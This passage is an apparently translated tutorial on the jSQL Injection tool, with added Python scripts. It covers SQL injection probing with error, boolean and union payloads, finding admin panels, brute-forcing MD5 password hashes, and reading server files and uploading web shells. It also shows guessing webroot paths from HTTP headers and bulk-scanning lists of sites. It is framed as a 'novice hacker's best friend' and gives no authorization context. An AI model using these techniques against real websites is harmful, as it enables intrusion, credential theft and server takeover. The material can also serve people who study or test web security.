    Usually the most interesting thing in the tables is the administrator's credentials.

    If you are lucky enough to find the administrator's data, it is still too early to celebrate: you also need to find the admin panel where these credentials can be entered.
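What jSQL Injection does when you press ENTER is, in outline, a set of differential requests. The Python script below is an added illustration, not jSQL's own code: it reproduces the three checks (error-based, boolean-based blind and union-based) against a constructed target, an in-memory SQLite "site" whose page handler concatenates the id parameter into SQL, next to the same handler with validation and a parameterised query. The table, its column names, the second user's hash and the sqli_marker string are assumptions made for the demo.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the target's database, so the probe runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("admin", "8743b52063cd84097a65d1633f5c74f5"),   # hash quoted later in the article
         ("guest", "d41d8cd98f00b204e9800998ecf8427e")],  # constructed (MD5 of "")
    )
    return conn


def vulnerable_page(conn, user_id):
    """Simulated handler for a 'page.php?id=' request that concatenates the
    parameter into SQL: the classic mistake behind injectable sites."""
    query = "SELECT name FROM users WHERE id = " + user_id
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        return "Database error: %s" % exc          # error-based leakage
    return "<h1>%s</h1>" % row[0] if row else "<h1>Not found</h1>"


def hardened_page(conn, user_id):
    """The same page with input validation and a parameterised query."""
    try:
        uid = int(user_id)
    except ValueError:
        return "<h1>Bad request</h1>"
    row = conn.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return "<h1>%s</h1>" % row[0] if row else "<h1>Not found</h1>"


def probe(fetch, value="1"):
    """Given fetch(param_value) -> page body, return the injection techniques
    the handler appears vulnerable to, in the order tested."""
    found = []
    baseline = fetch(value)

    # Error-based: a stray quote breaks the statement and the error text leaks.
    if "error" in fetch(value + "'").lower():
        found.append("error")

    # Boolean-based blind: a true condition must reproduce the baseline page
    # and a false one must change it; requiring both rules out coincidence.
    if fetch(value + " AND 1=1") == baseline and fetch(value + " AND 1=2") != baseline:
        found.append("blind")

    # Union-based: empty the real result and append a row of our own; the page
    # is injectable this way if our marker is rendered where the data was.
    if "sqli_marker" in fetch(value + " AND 1=2 UNION SELECT 'sqli_marker'"):
        found.append("union")
    return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(lambda v: vulnerable_page(db, v)))
    print("hardened:  ", probe(lambda v: hardened_page(db, v)))
```

On a real target `fetch` would perform the HTTP request. The boolean check here compares whole bodies, which breaks on pages that embed timestamps or per-request tokens; tools such as sqlmap compare a similarity ratio instead of exact equality for that reason.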

    5. Searching for admin panels with jSQL Injection

    To do this, go to the next tab, where you are greeted with a list of possible addresses. You can select one or more pages to check:

    The convenience is that you do not need any other programs for this.

    Unfortunately, careless programmers who store passwords in clear text are not that common. Quite often the password field contains something like

    8743b52063cd84097a65d1633f5c74f5

    This is a hash. A hash cannot be decrypted; it is cracked by brute force, hashing candidate passwords until one produces the same value. And jSQL Injection has a built-in brute forcer.

    6. Brute-forcing hashes with jSQL Injection

    The undoubted convenience is that you do not need to look for other programs. Many of the most popular hash types are supported.

    This is not the best option. To become a guru at cracking hashes, the book “” in Russian is recommended.

    But of course, when there is no other program at hand or no time to study, jSQL Injection with its built-in brute-force function comes in very handy.

    There are settings: you can choose which characters are included in the password and the range of password lengths.
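A hash brute forcer of the kind built into jSQL Injection does nothing more than the following. This Python block is an added example, not jSQL's implementation: it guesses the algorithm from the digest length (the 32-character hash above is MD5-sized), then enumerates every password over a chosen character set within a length range, which are exactly the two settings the program exposes. The target hashes in the demo are constructed from short passwords so that it finishes in well under a second.

```python
import hashlib
import itertools
import string


def hex_digest(algorithm, text):
    """Hash a candidate password with the named hashlib algorithm (md5, sha1, ...)."""
    return hashlib.new(algorithm, text.encode("utf-8")).hexdigest()


def identify_by_length(digest):
    """Guess the algorithm from the digest length alone. 32 hex characters is
    MD5-sized, but MD4 and NTLM share that length, so this is a first guess,
    not a fact; real tools ask you to name the hash type."""
    sizes = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
    return sizes.get(len(digest.strip()))


def brute_force(digest, algorithm, charset, min_len, max_len):
    """Try every string over charset with length min_len..max_len and return
    the first one whose hash matches, or None once the keyspace is exhausted."""
    target = digest.strip().lower()
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hex_digest(algorithm, candidate) == target:
                return candidate
    return None


def crack(digest, charset=string.ascii_lowercase + string.digits, min_len=1, max_len=4):
    """Identify the hash by its length, then brute-force it with the given
    character set and length range (the two knobs jSQL Injection offers)."""
    algorithm = identify_by_length(digest)
    if algorithm is None:
        return None
    return brute_force(digest, algorithm, charset, min_len, max_len)


if __name__ == "__main__":
    # Constructed target: MD5 of a deliberately short password.
    target = hex_digest("md5", "ab1")
    print(target, "->", crack(target, max_len=3))
```

The keyspace grows as charset^length: 36 characters at length 8 is already about 2.8 × 10^12 candidates, far beyond a Python loop. For anything longer than a few characters you want a wordlist and a GPU cracker rather than exhaustive enumeration, and you should confirm the hash type instead of trusting its length.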

    7. File operations after finding a SQL injection

    Besides reading and modifying databases, once a SQL injection has been found the following file operations become possible:

    • reading files on the server
    • uploading new files to the server
    • uploading shells to the server

    And all of this is implemented in jSQL Injection!

    There is a restriction: the database user the site connects with must hold the FILE privilege (this is MySQL's name for it). Sensible system administrators do not grant it, and without it you will not be able to reach the file system. On MySQL 5.7.6 and later the server's secure_file_priv setting additionally confines file reads and writes to one directory, or disables them entirely when it is NULL, even for a user who holds FILE.

    Checking for file privileges is simple: go to one of the tabs (reading files, creating a shell, uploading a new file) and try the corresponding operation.

    Another very important point: you need to know the exact absolute path of the file you want to work with, otherwise nothing will work.

    Look at the following screenshot:

    Every attempt to operate on a file is answered with: No FILE privilege. Nothing more can be done in that case.

    If instead you get a different error:

    Problem writing into [directory_name]

    this means the absolute path you gave for writing the file is wrong. Keep in mind that a write also fails when the directory exists but the MySQL server process has no permission to write there, or when secure_file_priv does not allow that location, so rule those out before assuming only the path is at fault.

    To guess an absolute path you at least need to know which operating system the server runs. To find out, switch to the Network tab.

    This entry (the Win64 token in the Server header) gives us reason to assume we are dealing with Windows:

    Keep-Alive: timeout=5, max=99
    Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
    Connection: Keep-Alive
    Method: HTTP/1.1 200 OK
    Content-Length: 353
    Date: Fri, 11 Dec 2015 11:48:31 GMT
    X-Powered-By: PHP/7.0.0RC6
    Content-Type: text/html; charset=UTF-8

    Here we have some kind of Unix (*BSD, Linux):

    Transfer-Encoding: chunked
    Date: Fri, 11 Dec 2015 11:57:02 GMT
    Method: HTTP/1.1 200 OK
    Keep-Alive: timeout=3, max=100
    Connection: keep-alive
    Content-Type: text/html
    X-Powered-By: PHP/5.3.29
    Server: Apache/2.2.31 (Unix)

    And here we have CentOS:

    Method: HTTP/1.1 200 OK
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/
    Connection: keep-alive
    X-Cache-Lookup: MISS from t1.hoster.ru:6666
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/5.4.37
    X-Cache: MISS from t1.hoster.ru
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Date: Fri, 11 Dec 2015 12:08:54 GMT
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=WINDOWS-1251
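Deciding between a Windows and a Unix path is what the header inspection above is for. The Python below is an added example rather than anything from jSQL Injection: it parses the three header dumps shown (copied here as constructed inputs in their original run-together form), reads the platform token Apache puts in parentheses in its Server header, and proposes document-root candidates to try first. The candidate lists are common defaults, not facts about any particular server, and the Server header itself is only a hint: an administrator can cut it down to "Apache" with ServerTokens Prod, so once the injection works, MySQL's own @@version_compile_os and @@datadir variables are the more reliable source.

```python
import re

# Constructed copies of the three header dumps shown above. jSQL labels the
# status line "Method:"; it is kept as-is so the parser handles real output.
WINDOWS_HEADERS = ("Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 "
                   "Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 "
                   "Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 "
                   "Content-Type: text/html; charset=UTF-8")
UNIX_HEADERS = ("Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT "
                "Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive "
                "Content-Type: text/html X-Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)")
CENTOS_HEADERS = ("Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT "
                  "Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive "
                  "X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) "
                  "X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru "
                  "Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 "
                  "Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked "
                  "Content-Type: text/html; charset=WINDOWS-1251")

# A new header starts at whitespace followed by "Name: " (a letter first, so
# "11:48:31" and "t1.hoster.ru:6666" inside values do not split anything).
HEADER_START = re.compile(r"\s+(?=[A-Za-z][A-Za-z0-9-]*:\s)")


def parse_headers(dump):
    """Split a run-together header dump into a {lower-case name: value} dict."""
    headers = {}
    for field in HEADER_START.split(dump.strip()):
        name, _, value = field.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def guess_os(headers):
    """Return ('windows' | 'unix' | 'unknown', platform token) from the Server
    header. Apache puts its build platform in parentheses: (Win64), (Unix), (CentOS)."""
    match = re.search(r"\(([^)]*)\)", headers.get("server", ""))
    token = match.group(1).strip() if match else ""
    if re.search(r"win(32|64|dows)", token, re.IGNORECASE):
        return "windows", token
    if token:
        return "unix", token
    return "unknown", token


def webroot_candidates(os_name, token):
    """Absolute document roots worth trying first. Common defaults only (assumed),
    with the article's own C:\\Server\\data\\htdocs\\ convention listed first."""
    if os_name == "windows":
        return ["C:\\Server\\data\\htdocs\\", "C:\\xampp\\htdocs\\", "C:\\Apache24\\htdocs\\"]
    if os_name == "unix":
        if re.search(r"centos|red hat|fedora", token, re.IGNORECASE):
            return ["/var/www/html/", "/usr/local/apache2/htdocs/"]
        if re.search(r"freebsd", token, re.IGNORECASE):
            return ["/usr/local/www/apache24/data/", "/usr/local/www/apache22/data/"]
        return ["/var/www/html/", "/var/www/", "/usr/local/apache2/htdocs/"]
    return []


def fingerprint(dump):
    """Everything the path-guessing step needs from one response's headers."""
    headers = parse_headers(dump)
    os_name, token = guess_os(headers)
    return {
        "os": os_name,
        "platform": token,
        "server": headers.get("server", ""),
        "php": headers.get("x-powered-by", ""),
        "candidates": webroot_candidates(os_name, token),
    }


if __name__ == "__main__":
    for dump in (WINDOWS_HEADERS, UNIX_HEADERS, CENTOS_HEADERS):
        print(fingerprint(dump))
```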

    On Windows a typical folder for sites is C:\Server\data\htdocs\ . But in fact, if someone "thought of" running a server on Windows, that person has very likely never heard of privileges, so you can start by trying to read straight from the C:/Windows/ directory:

    As you can see, everything went fine the first time.

    But the shells jSQL Injection itself provides raise doubts in my mind. If you have file privileges, you can easily upload something with a web interface.

    8. Bulk checking of sites for SQL injection

    Even this function is available in jSQL Injection. Everything is extremely simple: load a list of sites (it can be imported from a file), select the ones you want to check and click the appropriate button to start.

    Conclusion on jSQL Injection

    jSQL Injection is a good, powerful tool for finding and then exploiting SQL injections on websites. Its undoubted advantages are ease of use and the built-in related functions. jSQL Injection can be a beginner's best friend when analysing websites.

    Among the shortcomings, I would note the inability to edit databases (at least I did not find this functionality). Like all tools with a graphical interface, this program has the disadvantage that it cannot be used in scripts. Nevertheless, some automation is possible here too, thanks to the built-in bulk site-checking function.

    jSQL Injection is much more convenient to use than sqlmap. But sqlmap supports more types of SQL injection, has options for getting past web application firewalls (its tamper scripts) and some other functions.

    Bottom line: jSQL Injection is a novice hacker's best friend.

    Help for this program in the Kali Linux Encyclopedia can be found on this page: http://kali.tools/?p=706

